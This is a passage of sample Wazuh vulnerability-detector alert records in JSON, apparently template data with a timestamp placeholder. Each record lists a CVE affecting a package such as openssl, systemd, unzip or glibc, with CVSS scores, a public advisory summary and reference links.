file system races in libDeployPkg, related to the use of hard-coded paths under /tmp. Successful exploitation of this issue may result in a local privilege escalation. CVSS:3.0/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H","severity":"Medium","published":"2017-07-28","updated":"2017-08-08","state":"Unfixed","cwe_reference":"CWE-362","bugzilla_references":["http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=869633"],"references":["http://www.securityfocus.com/bid/100011","http://www.securitytracker.com/id/1039013","https://www.vmware.com/security/advisories/VMSA-2017-0013.html","https://nvd.nist.gov/vuln/detail/CVE-2015-5191","http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-5191.html","https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5191"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":7,"description":"CVE-2019-11727 affects thunderbird","id":"23504","firedtimes":312,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"thunderbird","version":"1:68.8.0+build2-0ubuntu0.16.04.2","architecture":"amd64","condition":"Package unfixed"},"cvss":{"cvss2":{"vector":{"attack_vector":"network","access_complexity":"low","authentication":"none","confidentiality_impact":"none","integrity_impact":"partial","availability":"none"},"base_score":"5"},"cvss3":{"vector":{"attack_vector":"network","access_complexity":"low","privileges_required":"none","user_interaction":"none","scope":"unchanged","confidentiality_impact":"none","integrity_impact":"low","availability":"none"},"base_score":"5.300000"}},"cve":"CVE-2019-11727","title":"CVE-2019-11727 on Ubuntu 16.04 LTS (xenial) - medium.","rationale":"A vulnerability exists where it possible to force Network Security Services (NSS) to sign CertificateVerify with PKCS#1 v1.5 signatures when those are the only ones advertised by server in CertificateRequest in TLS 1.3. PKCS#1 v1.5 signatures should not be used for TLS 1.3 messages. This vulnerability affects Firefox < 68.","severity":"Medium","published":"2019-07-23","updated":"2019-07-30","state":"Unfixed","cwe_reference":"CWE-295","bugzilla_references":["https://bugzilla.mozilla.org/show_bug.cgi?id=1552208"],"references":["http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00009.html","http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00010.html","http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00011.html","http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00017.html","http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00006.html","https://access.redhat.com/errata/RHSA-2019:1951","https://bugzilla.mozilla.org/show_bug.cgi?id=1552208","https://security.gentoo.org/glsa/201908-12","https://www.mozilla.org/security/advisories/mfsa2019-21/","https://nvd.nist.gov/vuln/detail/CVE-2019-11727","http://people.canonical.com/~ubuntu-security/cve/2019/CVE-2019-11727.html","https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11727","https://usn.ubuntu.com/usn/usn-4054-1","https://usn.ubuntu.com/usn/usn-4060-1","https://www.mozilla.org/en-US/security/advisories/mfsa2019-21/#CVE-2019-11727"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":7,"description":"CVE-2017-7244 affects libpcre3","id":"23504","firedtimes":265,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"libpcre3","source":"pcre3","version":"2:8.38-3.1","architecture":"amd64","condition":"Package unfixed"},"cvss":{"cvss2":{"vector":{"attack_vector":"network","access_complexity":"medium","authentication":"none","confidentiality_impact":"none","integrity_impact":"none","availability":"partial"},"base_score":"4.300000"},"cvss3":{"vector":{"attack_vector":"local","access_complexity":"low","privileges_required":"none","user_interaction":"required","scope":"unchanged","confidentiality_impact":"none","integrity_impact":"none","availability":"high"},"base_score":"5.500000"}},"cve":"CVE-2017-7244","title":"CVE-2017-7244 on Ubuntu 16.04 LTS (xenial) - low.","rationale":"The _pcre32_xclass function in pcre_xclass.c in libpcre1 in PCRE 8.40 allows remote attackers to cause a denial of service (invalid memory read) via a crafted file.","severity":"Medium","published":"2017-03-23","updated":"2018-08-17","state":"Unfixed","cwe_reference":"CWE-125","bugzilla_references":["https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=858683","https://bugs.exim.org/show_bug.cgi?id=2052","https://bugs.exim.org/show_bug.cgi?id=2054"],"references":["http://www.securityfocus.com/bid/97067","https://access.redhat.com/errata/RHSA-2018:2486","https://blogs.gentoo.org/ago/2017/03/20/libpcre-invalid-memory-read-in-_pcre32_xclass-pcre_xclass-c/","https://security.gentoo.org/glsa/201710-25","https://nvd.nist.gov/vuln/detail/CVE-2017-7244","http://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-7244.html","https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7244"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":10,"description":"CVE-2018-1000035 affects unzip","id":"23505","firedtimes":1,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"unzip","version":"6.0-21ubuntu1","architecture":"amd64","condition":"Package less or equal than 6.00"},"cvss":{"cvss2":{"vector":{"attack_vector":"network","access_complexity":"medium","authentication":"none","confidentiality_impact":"partial","integrity_impact":"partial","availability":"partial"},"base_score":"6.800000"},"cvss3":{"vector":{"attack_vector":"local","access_complexity":"low","privileges_required":"none","user_interaction":"required","scope":"unchanged","confidentiality_impact":"high","integrity_impact":"high","availability":"high"},"base_score":"7.800000"}},"cve":"CVE-2018-1000035","title":"CVE-2018-1000035 on Ubuntu 18.04 LTS (bionic) - low.","rationale":"A heap-based buffer overflow exists in Info-Zip UnZip version <= 6.00 in the processing of password-protected archives that allows an attacker to perform a denial of service or to possibly achieve code execution.","severity":"High","published":"2018-02-09","updated":"2020-01-29","state":"Fixed","cwe_reference":"CWE-119","bugzilla_references":["http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=889838"],"references":["https://lists.debian.org/debian-lts-announce/2020/01/msg00026.html","https://sec-consult.com/en/blog/advisories/multiple-vulnerabilities-in-infozip-unzip/index.html","https://security.gentoo.org/glsa/202003-58","https://nvd.nist.gov/vuln/detail/CVE-2018-1000035","http://people.canonical.com/~ubuntu-security/cve/2018/CVE-2018-1000035.html","https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000035","https://www.sec-consult.com/en/blog/advisories/multiple-vulnerabilities-in-infozip-unzip/index.html"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":5,"description":"CVE-2019-1552 affects openssl","id":"23503","firedtimes":11,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"openssl","version":"1.1.1-1ubuntu2.1~18.04.6","architecture":"amd64","condition":"Package greater or equal than 1.1.1 and less or equal than 1.1.1c"},"cvss":{"cvss2":{"vector":{"attack_vector":"local","access_complexity":"medium","authentication":"none","confidentiality_impact":"none","integrity_impact":"partial","availability":"none"},"base_score":"1.900000"},"cvss3":{"vector":{"attack_vector":"local","access_complexity":"low","privileges_required":"low","user_interaction":"none","scope":"unchanged","confidentiality_impact":"none","integrity_impact":"low","availability":"none"},"base_score":"3.300000"}},"cve":"CVE-2019-1552","title":"OpenSSL has internal defaults for a directory tree where it can find a configuration file as well as certificates used for verification in TLS. This directory is most commonly referred to as OPENSSLDIR, and is configurable with the --prefix / --openssldir configuration options. For OpenSSL versions 1.1.0 and 1.1.1, the mingw configuration targets assume that resulting programs and libraries are installed in a Unix-like environment and the default prefix for program installation as well as for OPENSSLDIR should be '/usr/local'. However, mingw programs are Windows programs, and as such, find themselves looking at sub-directories of 'C:/usr/local', which may be world writable, which enables untrusted users to modify OpenSSL's default configuration, insert CA certificates, modify (or even replace) existing engine modules, etc. For OpenSSL 1.0.2, '/usr/local/ssl' is used as default for OPENSSLDIR on all Unix and Windows targets, including Visual C builds. However, some build instructions for the diverse Windows targets on 1.0.2 encourage you to specify your own --prefix. OpenSSL versions 1.1.1, 1.1.0 and 1.0.2 are affected by this issue. Due to the limited scope of affected deployments this has been assessed as low severity and therefore we are not creating new releases at this time. Fixed in OpenSSL 1.1.1d (Affected 1.1.1-1.1.1c). Fixed in OpenSSL 1.1.0l (Affected 1.1.0-1.1.0k). Fixed in OpenSSL 1.0.2t (Affected 1.0.2-1.0.2s).","severity":"Low","published":"2019-07-30","updated":"2019-08-23","state":"Fixed","cwe_reference":"CWE-295","references":["https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=54aa9d51b09d67e90db443f682cface795f5af9e","https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=b15a19c148384e73338aa7c5b12652138e35ed28","https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=d333ebaf9c77332754a9d5e111e2f53e1de54fdd","https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=e32bc855a81a2d48d215c506bdeb4f598045f7e9","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EWC42UXL5GHTU5G77VKBF6JYUUNGSHOM/","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Y3IVFGSERAZLNJCK35TEM2R4726XIH3Z/","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZBEV5QGDRFUZDMNECFXUSN5FMYOZDE4V/","https://security.netapp.com/advisory/ntap-20190823-0006/","https://support.f5.com/csp/article/K94041354","https://support.f5.com/csp/article/K94041354?utm_source=f5support&utm_medium=RSS","https://www.openssl.org/news/secadv/20190730.txt","https://www.oracle.com/security-alerts/cpuapr2020.html","https://www.oracle.com/security-alerts/cpujan2020.html","https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html","https://www.tenable.com/security/tns-2019-08","https://www.tenable.com/security/tns-2019-09","https://nvd.nist.gov/vuln/detail/CVE-2019-1552"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":10,"description":"CVE-2019-3843 affects systemd","id":"23505","firedtimes":134,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"systemd","version":"229-4ubuntu21.27","architecture":"amd64","condition":"Package less than 242"},"cvss":{"cvss2":{"vector":{"attack_vector":"local","access_complexity":"low","authentication":"none","confidentiality_impact":"partial","integrity_impact":"partial","availability":"partial"},"base_score":"4.600000"},"cvss3":{"vector":{"attack_vector":"local","access_complexity":"low","privileges_required":"low","user_interaction":"none","scope":"unchanged","confidentiality_impact":"high","integrity_impact":"high","availability":"high"},"base_score":"7.800000"}},"cve":"CVE-2019-3843","title":"It was discovered that a systemd service that uses DynamicUser property can create a SUID/SGID binary that would be allowed to run as the transient service UID/GID even after the service is terminated. A local attacker may use this flaw to access resources that will be owned by a potentially different service in the future, when the UID/GID will be recycled.","severity":"High","published":"2019-04-26","updated":"2019-06-19","state":"Fixed","cwe_reference":"CWE-264","references":["http://www.securityfocus.com/bid/108116","https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3843","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5JXQAKSTMABZ46EVCRMW62DHWYHTTFES/","https://security.netapp.com/advisory/ntap-20190619-0002/","https://usn.ubuntu.com/4269-1/","https://nvd.nist.gov/vuln/detail/CVE-2019-3843"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":7,"description":"CVE-2018-15919 affects openssh-client","id":"23504","firedtimes":197,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"openssh-client","source":"openssh","version":"1:7.6p1-4ubuntu0.3","architecture":"amd64","condition":"Package greater or equal than 5.9 and less or equal than 7.8"},"cvss":{"cvss2":{"vector":{"attack_vector":"network","access_complexity":"low","authentication":"none","confidentiality_impact":"partial","integrity_impact":"none","availability":"none"},"base_score":"5"},"cvss3":{"vector":{"attack_vector":"network","access_complexity":"low","privileges_required":"none","user_interaction":"none","scope":"unchanged","confidentiality_impact":"low","integrity_impact":"none","availability":"none"},"base_score":"5.300000"}},"cve":"CVE-2018-15919","title":"CVE-2018-15919 on Ubuntu 18.04 LTS (bionic) - low.","rationale":"Remotely observable behaviour in auth-gss2.c in OpenSSH through 7.8 could be used by remote attackers to detect existence of users on a target system when GSS2 is in use. NOTE: the discoverer states 'We understand that the OpenSSH developers do not want to treat such a username enumeration (or \"oracle\") as a vulnerability.'","severity":"Medium","published":"2018-08-28","updated":"2019-03-07","state":"Fixed","cwe_reference":"CWE-200","bugzilla_references":["http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=907503","https://bugzilla.novell.com/show_bug.cgi?id=CVE-2018-15919"],"references":["http://seclists.org/oss-sec/2018/q3/180","http://www.securityfocus.com/bid/105163","https://security.netapp.com/advisory/ntap-20181221-0001/","https://nvd.nist.gov/vuln/detail/CVE-2018-15919","http://people.canonical.com/~ubuntu-security/cve/2018/CVE-2018-15919.html","http://www.openwall.com/lists/oss-security/2018/08/27/2","https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15919"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":7,"description":"CVE-2017-7244 affects libpcre3","id":"23504","firedtimes":265,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"libpcre3","source":"pcre3","version":"2:8.38-3.1","architecture":"amd64","condition":"Package unfixed"},"cvss":{"cvss2":{"vector":{"attack_vector":"network","access_complexity":"medium","authentication":"none","confidentiality_impact":"none","integrity_impact":"none","availability":"partial"},"base_score":"4.300000"},"cvss3":{"vector":{"attack_vector":"local","access_complexity":"low","privileges_required":"none","user_interaction":"required","scope":"unchanged","confidentiality_impact":"none","integrity_impact":"none","availability":"high"},"base_score":"5.500000"}},"cve":"CVE-2017-7244","title":"CVE-2017-7244 on Ubuntu 16.04 LTS (xenial) - low.","rationale":"The _pcre32_xclass function in pcre_xclass.c in libpcre1 in PCRE 8.40 allows remote attackers to cause a denial of service (invalid memory read) via a crafted file.","severity":"Medium","published":"2017-03-23","updated":"2018-08-17","state":"Unfixed","cwe_reference":"CWE-125","bugzilla_references":["https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=858683","https://bugs.exim.org/show_bug.cgi?id=2052","https://bugs.exim.org/show_bug.cgi?id=2054"],"references":["http://www.securityfocus.com/bid/97067","https://access.redhat.com/errata/RHSA-2018:2486","https://blogs.gentoo.org/ago/2017/03/20/libpcre-invalid-memory-read-in-_pcre32_xclass-pcre_xclass-c/","https://security.gentoo.org/glsa/201710-25","https://nvd.nist.gov/vuln/detail/CVE-2017-7244","http://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-7244.html","https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7244"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":7,"description":"CVE-2018-20217 affects libkrb5-3","id":"23504","firedtimes":254,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"libkrb5-3","source":"krb5","version":"1.13.2+dfsg-5ubuntu2.1","architecture":"amd64","condition":"Package unfixed"},"cvss":{"cvss2":{"vector":{"attack_vector":"network","access_complexity":"medium","authentication":"single","confidentiality_impact":"none","integrity_impact":"none","availability":"partial"},"base_score":"3.500000"},"cvss3":{"vector":{"attack_vector":"network","access_complexity":"high","privileges_required":"low","user_interaction":"none","scope":"unchanged","confidentiality_impact":"none","integrity_impact":"none","availability":"high"},"base_score":"5.300000"}},"cve":"CVE-2018-20217","title":"CVE-2018-20217 on Ubuntu 16.04 LTS (xenial) - medium.","rationale":"A Reachable Assertion issue was discovered in the KDC in MIT Kerberos 5 (aka krb5) before 1.17. If an attacker can obtain a krbtgt ticket using an older encryption type (single-DES, triple-DES, or RC4), the attacker can crash the KDC by making an S4U2Self request.","severity":"Medium","published":"2018-12-26","updated":"2019-10-03","state":"Unfixed","cwe_reference":"CWE-617","bugzilla_references":["http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=917387","http://krbdev.mit.edu/rt/Ticket/Display.html?id=8763"],"references":["http://krbdev.mit.edu/rt/Ticket/Display.html?id=8763","https://github.com/krb5/krb5/commit/5e6d1796106df8ba6bc1973ee0917c170d929086","https://lists.debian.org/debian-lts-announce/2019/01/msg00020.html","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2KNHELH4YHNT6H2ESJWX2UIDXLBNGB2O/","https://security.netapp.com/advisory/ntap-20190416-0006/","https://nvd.nist.gov/vuln/detail/CVE-2018-20217","http://people.canonical.com/~ubuntu-security/cve/2018/CVE-2018-20217.html","https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20217"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":5,"description":"CVE-2019-1547 affects libssl1.0.0","id":"23503","firedtimes":35,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"libssl1.0.0","source":"openssl","version":"1.0.2g-1ubuntu4.15","architecture":"amd64","condition":"Package greater or equal than 1.0.2 and less or equal than 1.0.2s"},"cvss":{"cvss2":{"vector":{"attack_vector":"local","access_complexity":"medium","authentication":"none","confidentiality_impact":"partial","integrity_impact":"none","availability":"none"},"base_score":"1.900000"}},"cve":"CVE-2019-1547","title":"CVE-2019-1547 on Ubuntu 16.04 LTS (xenial) - low.","rationale":"Normally in OpenSSL EC groups always have a co-factor present and this is used in side channel resistant code paths. However, in some cases, it is possible to construct a group using explicit parameters (instead of using a named curve). In those cases it is possible that such a group does not have the cofactor present. This can occur even where all the parameters match a known named curve. If such a curve is used then OpenSSL falls back to non-side channel resistant code paths which may result in full key recovery during an ECDSA signature operation. In order to be vulnerable an attacker would have to have the ability to time the creation of a large number of signatures where explicit parameters with no co-factor present are in use by an application using libcrypto. For the avoidance of doubt libssl is not vulnerable because explicit parameters are never used. Fixed in OpenSSL 1.1.1d (Affected 1.1.1-1.1.1c). Fixed in OpenSSL 1.1.0l (Affected 1.1.0-1.1.0k). Fixed in OpenSSL 1.0.2t (Affected 1.0.2-1.0.2s).","severity":"Low","published":"2019-09-10","updated":"2019-09-12","state":"Fixed","cwe_reference":"CWE-311","references":["http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00054.html","http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00072.html","http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00012.html","http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00016.html","http://packetstormsecurity.com/files/154467/Slackware-Security-Advisory-openssl-Updates.html","https://arxiv.org/abs/1909.01785","https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=21c856b75d81eff61aa63b4f036bb64a85bf6d46","https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=30c22fa8b1d840036b8e203585738df62a03cec8","https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=7c1709c2da5414f5b6133d00a03fc8c5bf996c7a","https://lists.debian.org/debian-lts-announce/2019/09/msg00026.html","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GY6SNRJP2S7Y42GIIDO3HXPNMDYN2U3A/","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZN4VVQJ3JDCHGIHV4Y2YTXBYQZ6PWQ7E/","https://seclists.org/bugtraq/2019/Oct/0","https://seclists.org/bugtraq/2019/Oct/1","https://seclists.org/bugtraq/2019/Sep/25","https://security.gentoo.org/glsa/201911-04","https://security.netapp.com/advisory/ntap-20190919-0002/","https://security.netapp.com/advisory/ntap-20200122-0002/","https://support.f5.com/csp/article/K73422160?utm_source=f5support&utm_medium=RSS","https://www.debian.org/security/2019/dsa-4539","https://www.debian.org/security/2019/dsa-4540","https://www.openssl.org/news/secadv/20190910.txt","https://www.oracle.com/security-alerts/cpuapr2020.html","https://www.oracle.com/security-alerts/cpujan2020.html","https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html","https://www.tenable.com/security/tns-2019-08","https://www.tenable.com/security/tns-2019-09","https://nvd.nist.gov/vuln/detail/CVE-2019-1547","http://people.canonical.com/~ubuntu-security/cve/2019/CVE-2019-1547.html","https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1547","https://usn.ubuntu.com/usn/usn-4376-1"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":10,"description":"CVE-2019-15847 affects gcc","id":"23505","firedtimes":86,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"gcc","source":"gcc-defaults","version":"4:7.4.0-1ubuntu2.3","architecture":"amd64","condition":"Package less than 10.0"},"cvss":{"cvss2":{"vector":{"attack_vector":"network","access_complexity":"low","authentication":"none","confidentiality_impact":"partial","integrity_impact":"none","availability":"none"},"base_score":"5"},"cvss3":{"vector":{"attack_vector":"network","access_complexity":"low","privileges_required":"none","user_interaction":"none","scope":"unchanged","confidentiality_impact":"high","integrity_impact":"none","availability":"none"},"base_score":"7.500000"}},"cve":"CVE-2019-15847","title":"CVE-2019-15847 on Ubuntu 18.04 LTS (bionic) - negligible.","rationale":"The POWER9 backend in GNU Compiler Collection (GCC) before version 10 could optimize multiple calls of the __builtin_darn intrinsic into a single call, thus reducing the entropy of the random number generator. This occurred because a volatile operation was not specified. For example, within a single execution of a program, the output of every __builtin_darn() call may be the same.","severity":"High","published":"2019-09-02","updated":"2020-05-26","state":"Fixed","cwe_reference":"CWE-331","bugzilla_references":["https://gcc.gnu.org/bugzilla/show_bug.cgi?id=91481"],"references":["http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00056.html","http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00057.html","http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00058.html","https://gcc.gnu.org/bugzilla/show_bug.cgi?id=91481","https://nvd.nist.gov/vuln/detail/CVE-2019-15847","http://people.canonical.com/~ubuntu-security/cve/2019/CVE-2019-15847.html","https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15847"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":7,"description":"CVE-2019-17540 affects imagemagick","id":"23504","firedtimes":2,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"imagemagick","version":"8:6.9.7.4+dfsg-16ubuntu6.8","architecture":"amd64","condition":"Package less than 7.0.8-54"},"cvss":{"cvss2":{"vector":{"attack_vector":"network","access_complexity":"medium","authentication":"none","confidentiality_impact":"partial","integrity_impact":"partial","availability":"partial"},"base_score":"6.800000"}},"cve":"CVE-2019-17540","title":"ImageMagick before 7.0.8-54 has a heap-based buffer overflow in ReadPSInfo in coders/ps.c.","severity":"Medium","published":"2019-10-14","updated":"2019-10-23","state":"Fixed","cwe_reference":"CWE-120","references":["https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=15826","https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=942578","https://github.com/ImageMagick/ImageMagick/compare/7.0.8-53...7.0.8-54","https://github.com/ImageMagick/ImageMagick/compare/master@%7B2019-07-15%7D...master@%7B2019-07-17%7D","https://security-tracker.debian.org/tracker/CVE-2019-17540","https://nvd.nist.gov/vuln/detail/CVE-2019-17540"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":13,"description":"CVE-2019-9169 affects libc6","id":"23506","firedtimes":68,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"libc6","source":"glibc","version":"2.23-0ubuntu11","architecture":"amd64","condition":"Package less or equal than 2.29"},"cvss":{"cvss2":{"vector":{"attack_vector":"network","access_complexity":"low","authentication":"none","confidentiality_impact":"partial","integrity_impact":"partial","availability":"partial"},"base_score":"7.500000"},"cvss3":{"vector":{"attack_vector":"network","access_complexity":"low","privileges_required":"none","user_interaction":"none","scope":"unchanged","confidentiality_impact":"high","integrity_impact":"high","availability":"high"},"base_score":"9.800000"}},"cve":"CVE-2019-9169","title":"CVE-2019-9169 on Ubuntu 16.04 LTS (xenial) - low.","rationale":"In the GNU C Library (aka glibc or libc6) through 2.29, proceed_next_node in posix/regexec.c has a heap-based buffer over-read via an attempted case-insensitive regular-expression match.","severity":"Critical","published":"2019-02-26","updated":"2019-04-16","state":"Fixed","cwe_reference":"CWE-125","bugzilla_references":["https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34140","https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34142","https://sourceware.org/bugzilla/show_bug.cgi?id=24114"],"references":["http://www.securityfocus.com/bid/107160","https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34140","https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34142","https://kc.mcafee.com/corporate/index?page=content&id=SB10278","https://security.netapp.com/advisory/ntap-20190315-0002/","https://sourceware.org/bugzilla/show_bug.cgi?id=24114","https://sourceware.org/git/gitweb.cgi?p=glibc.git;a=commit;h=583dd860d5b833037175247230a328f0050dbfe9","https://support.f5.com/csp/article/K54823184","https://nvd.nist.gov/vuln/detail/CVE-2019-9169","http://people.canonical.com/~ubuntu-security/cve/2019/CVE-2019-9169.html","https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9169"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} 